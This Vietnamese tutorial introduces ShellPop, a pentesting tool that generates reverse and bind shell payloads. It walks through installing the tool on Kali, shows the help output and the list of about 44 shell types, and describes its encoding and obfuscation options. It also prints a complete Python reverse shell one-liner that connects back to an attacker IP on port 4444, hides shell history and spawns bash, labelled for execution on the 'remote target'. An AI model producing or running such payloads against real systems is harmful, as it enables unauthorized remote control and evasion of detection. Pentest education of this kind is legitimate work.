Bạn đã chán cảnh lưu lại các lệnh shell trên máy tính của mình, và bạn đã mệt mỏi khi đi tìm chúng ở đâu mỗi khi mình cần. Để giải quyết việc này, Shellpop được sinh ra với vô vàn các tiện ích mà nó đem lại, giờ đây bạn sẽ không cần phải lưu lại và đi tìm các lệnh shell mỗi khi cần nữa.

About

Công cụ này được phát triển bởi Andre Marques và đây là một mã nguồn mở nên ai có bất kỳ ý tưởng nào hay ho thì tham gia vào cùng phát triển nhé

Github: https://github.com/0x00-0x00/ShellPop

Cài đặt

Chương trình bắt buộc cài Python 2.7

Đầu tiên chúng ta cần phải clone git về

1
git clone https://github.com/0x00-0x00/ShellPop.git

Tiếp theo gõ lệnh cd Shellpop/

Thực hiện cài đặt các dịch vụ bắt buộc

1
2
root@kali# apt-get install python-argcomplete metasploit-framework -y
root@kali# pip install -r requirements.txt

Bắt đầu cài đặt

1
root@kali# python setup.py install

Vậy là ta đã cài đặt xong, bắt đầu vào sử dụng thôi.

Sử dụng

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
root@kali:~/Documents/ShellPop# shellpop --help
usage: shellpop [-h] [-l] [-H HOST] [-P PORT] [--number NUMBER]
        [--shell SHELL] [--reverse] [--bind] [--payload PAYLOAD]
        [--xor] [--base64] [--urlencode] [--ipfuscate]
        [--obfuscate-small] [--handler] [--stager STAGER]
        [--http-port HTTP_PORT] [--powershell-x86] [--powershell-x64]
        [--powershell-random-case] [--clip]

Options:
 -h, --help      show this help message and exit
 -l, --list      List of available shells
 -H HOST, --host HOST IP to be used in connectback (reverse) shells.
 -P PORT, --port PORT Port to be used in reverse/bind shell code.
 --number NUMBER    Shell code index number
 --shell SHELL     Terminal shell to be used when decoding some encoding
            scheme.
 --handler       Use handler, if possible.

Shell Types:
 --reverse       Victim communicates back to the attacking machine.
 --bind        Open up a listener on the victim machine.
 --payload PAYLOAD   Choose the payload

Encoders Options:
 --xor         Enable XOR obfuscation
 --base64       Encode command in base64.
 --urlencode      Encode the command in URL encoding.

Obfuscation Options:
 --ipfuscate      Obfuscate IP address.
 --obfuscate-small   Obfuscated command will be as small as possible.

Staging Options:
 --stager STAGER    Use staging for shells
 --http-port HTTP_PORT
            HTTP staging port to be used

PowerShell options:
 --powershell-x86   Use powershell 32-bit executable.
 --powershell-x64   Use powershell 64-bit executable.
 --powershell-random-case
            Use random-case in powershell payloads.

Miscellaneous:
 --clip        Copy payload to your clipboard automatically.

Pop shells like a master. For more help
visit:https://github.com/0x00-0x00/ShellPop

Danh sách shell

Shellpop cung cấp cho ta khá nhiều tiện ích, bạn có thể liệt kê tất cả các shell của shellpop bằng cách sử dụng tùy chọn lệnh –list Ví dụ:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
root@kali:~/Documents/ShellPop# shellpop --list
shellpop v0.36
Contributors: @zc00l,@touhidshaikh,@lowfuel

[+] Bind shells:

 1. Python TCP +pty
 2. Python UDP
 3. Perl TCP
 4. Perl UDP
 5. PHP TCP
 6. PHP UDP
 7. Ruby TCP
 8. Ruby UDP
 9. Netcat (OpenBSD) TCP
 10. Netcat+coproc (OpenBSD) UDP
 11. Netcat (Traditional) TCP
 12. AWK TCP
 13. socat UDP
 14. Windows Powershell TCP
 15. Windows Powershell Nishang TCP


[+] Reverse shells:

 1. Python TCP +pty
 2. Python UDP
 3. PHP TCP
 4. Ruby TCP
 5. Perl TCP 01
 6. Perl TCP 02
 7. Perl UDP [nc -lkvup PORT]
 8. Bash TCP
 9. Windows Powershell TCP
 10. TCLsh TCP
 11. Ncat TCP
 12. Ncat SSL TCP
 13. Netcat (Traditional) UDP
 14. Netcat (Traditional) TCP
 15. Netcat (OpenBSD) mkfifo TCP
 16. Netcat (OpenBSD) mknod TCP
 17. Telnet mkfifo TCP
 18. Telnet mknod TCP
 19. openssl TCP
 20. socat TCP
 21. awk TCP
 22. awk UDP
 23. Windows Bat2Ncat TCP
 24. Windows Powershell Shellcode-Injection a.k.a BloodSeeker TCP - x64
 25. Windows Powershell Tiny TCP
 26. Windows Powershell Nishang TCP
 27. Windows Powershell Nishang ICMP
 28. Windows Bat2Meterpreter TCP
 29. Groovy TCP

Ở đây chúng ta thấy được là shellpop hỗ trợ đủ loại ngôn ngữ từ Python, PHP, Ruby, Perl cho đến Windows Powershell, … Shellpop còn hỗ trợ cả TCP, UDP, ICMP, …

Sao chép vào clipboard

Shellpop sẽ không cho bạn lãng phí một giây phút nào cả (vì mục đích của chương trình này được tạo ra là giúp người dùng không lãng phí thời gian mà). Với tùy chọn --clip, ngay lập tức shell mà bạn vừa tạo ra sẽ được sao chép vào clipboard của bạn rồi. Việc của bạn chỉ việc paste ra mà thôi.

Bind shells và Reverse shells

Chúng ta tập trung vào 2 vấn đề chính là Bind shellsReverse shells

Chúng ta thử tạo 1 reverse shells xem sao nhé

Ở đây mình tạo 1 Reverse Shell ở IP trên eth0 và cổng 4444

Command line examples

1
2
3
4
5
6
root@kali:~# shellpop --host eth0 --port 4444 --reverse --number 1
[+] Execute this code in remote target: 

python -c "import os;import pty;import socket;jbNZvh='192.168.19.100';GCVfMeJlExfIfs=4444;ugQNFu=socket.socket(socket.AF_INET,socket.SOCK_STREAM);ugQNFu.connect((jbNZvh,GCVfMeJlExfIfs));os.dup2(ugQNFu.fileno(),0);os.dup2(ugQNFu.fileno(),1);os.dup2(ugQNFu.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn('/bin/bash');ugQNFu.close();" 

[+] This shell DOES NOT have a handler set.
 • shellpop: gọi chương trình shellpop
 • --host: Xác định địa chỉ đích
 • --port: Xác định cổng
 • --reverse: Chọn tùy chọn reverse
 • --number: Xác định kiểu mà mình muốn tạo shell, với số thứ tự ở tùy chọn --list bên trên.

Tự động hoàn thành

Với chức năng này, bạn có thể quên luôn cái --list, --number kia đi, dưới đây là ví dụ cho các bạn hiểu.

Chỉ cần bám vào đối số của --payload là bạn có thể tự tạo cho mình 1 shell mong muốn rồi.

Mã hóa

Hiện tại chương trình cung cấp 3 loại mã hóa là XOR, Base64 và URL. Chúng ta có thể sử dụng từng loại mã hóa hoặc có thể “mix” nhiều loại với nhau.

Ví dụ:

Handlers

Tùy chọn này giúp bạn giảm thiểu tối đa việc tạo và connect shell. Ví dụ:

Tổng kết

Shellpop là một công cụ tuyệt vời cho những bài pentest. Còn rất nhiều tiện ích hay mà công cụ đem lại, bạn đọc tìm hiểu dần dần nhé. Nếu thấy bài viết hữu ích thì để lại 1 share 1 upvote để mình có động lực ra các bài viết hay hơn nhé.